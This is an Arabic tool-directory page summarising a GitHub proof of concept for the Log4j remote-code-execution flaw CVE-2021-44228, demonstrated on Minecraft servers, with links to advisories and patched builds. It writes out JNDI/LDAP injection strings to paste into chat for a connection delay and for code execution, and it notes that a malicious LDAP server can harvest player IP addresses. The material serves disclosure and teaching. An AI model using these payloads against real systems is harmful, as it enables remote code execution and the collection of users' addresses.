Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4J-RCE-Proof-Of-Concept — Log4j-RCE (CVE-2021-44228) إثبات المفهوم مع معلومات إضافية | Kitploit
أدوات/GitHubGitHub/hycrafthd/log4j-rce-proof-of-concept
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhycrafthd/log4j-rce-proof-of-concept

Log4J-RCE-Proof-Of-Concept

Log4j-RCE (CVE-2021-44228) إثبات المفهوم مع معلومات إضافية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودعالموقع الإلكتروني
182312منذ 4 سنواتتمت المراجعة من قبل Kitploit
مشاركة

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)

هذا دليل إثبات للمفهوم لثغرة log4j RCE.

فيما يلي بعض الروابط الخاصة بـ CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

تؤثر هذه الثغرة على جميع إصدارات log4j2 تقريبًا وربما إصدارات log4j1. الإصدار الموصى باستخدامه هو 2.15.0 والذي يُصلح الثغرة.

عرض توضيحي مع ماينكرافت (الذي يستخدم log4j2)

  • التفاصيل حول تأثير الثغرة على ماينكرافت موجودة هنا: https://twitter.com/slicedlime/status/1469150993527017483
  • مقال من ماينكرافت هنا: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • إصدارات ماينكرافت فورج المُصلحة: https://twitter.com/gigaherz/status/1469331288368861195
  • مقال تفصيلي من ماينكرافت فورج: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • إصدارات ماينكرافت فابريك المُصلحة: https://twitter.com/slicedlime/status/1469192689904193537
  • إصدارات ماينكرافت بيبر المُصلحة: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • إصدارات ماينكرافت سبجوت المُصلحة: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • إصدارات ماينكرافت سبونج المُصلحة: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196
  • تأخير أو إرسال بيانات متسلسلة

    • الصق ${jndi:ldap://127.0.0.1/e} في الشات. إذا كان هناك منفذ مفتوح على المنفذ 389، يحاول log4j الاتصال ويعطل الاتصال اللاحق حتى انتهاء المهلة.
    • عند استخدام دليل الإثبات هذا، سيسجل الكونسول THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! وهو كائن نصي متسلسل من خادم ldap.

    image

    • بالإضافة إلى ذلك، يتلقى خادم ldap الضار كل عنوان IP حيث يتم تسجيل الرسالة. وهذا يعني أنه يمكن جمع عناوين IP للاعبين على الخادم باستخدام هذه الثغرة.

    تنفيذ الأوامر عن بُعد (RCE)

    • الصق ${jndi:ldap://127.0.0.1/exe} في الشات. إذا تم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true على true، فسيحدث تنفيذ الأوامر عن بُعد.

    image

    • لحسن الحظ، تقوم إصدارات JDK الحديثة بتعطيل تحميل الفئات عن بُعد افتراضيًا. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
    • قد تسمح الإصدارات القديمة بهذا!!

    إخلاء مسؤولية

    هذا المشروع مخصص للأغراض التعليمية فقط.

    تنزيل الأداة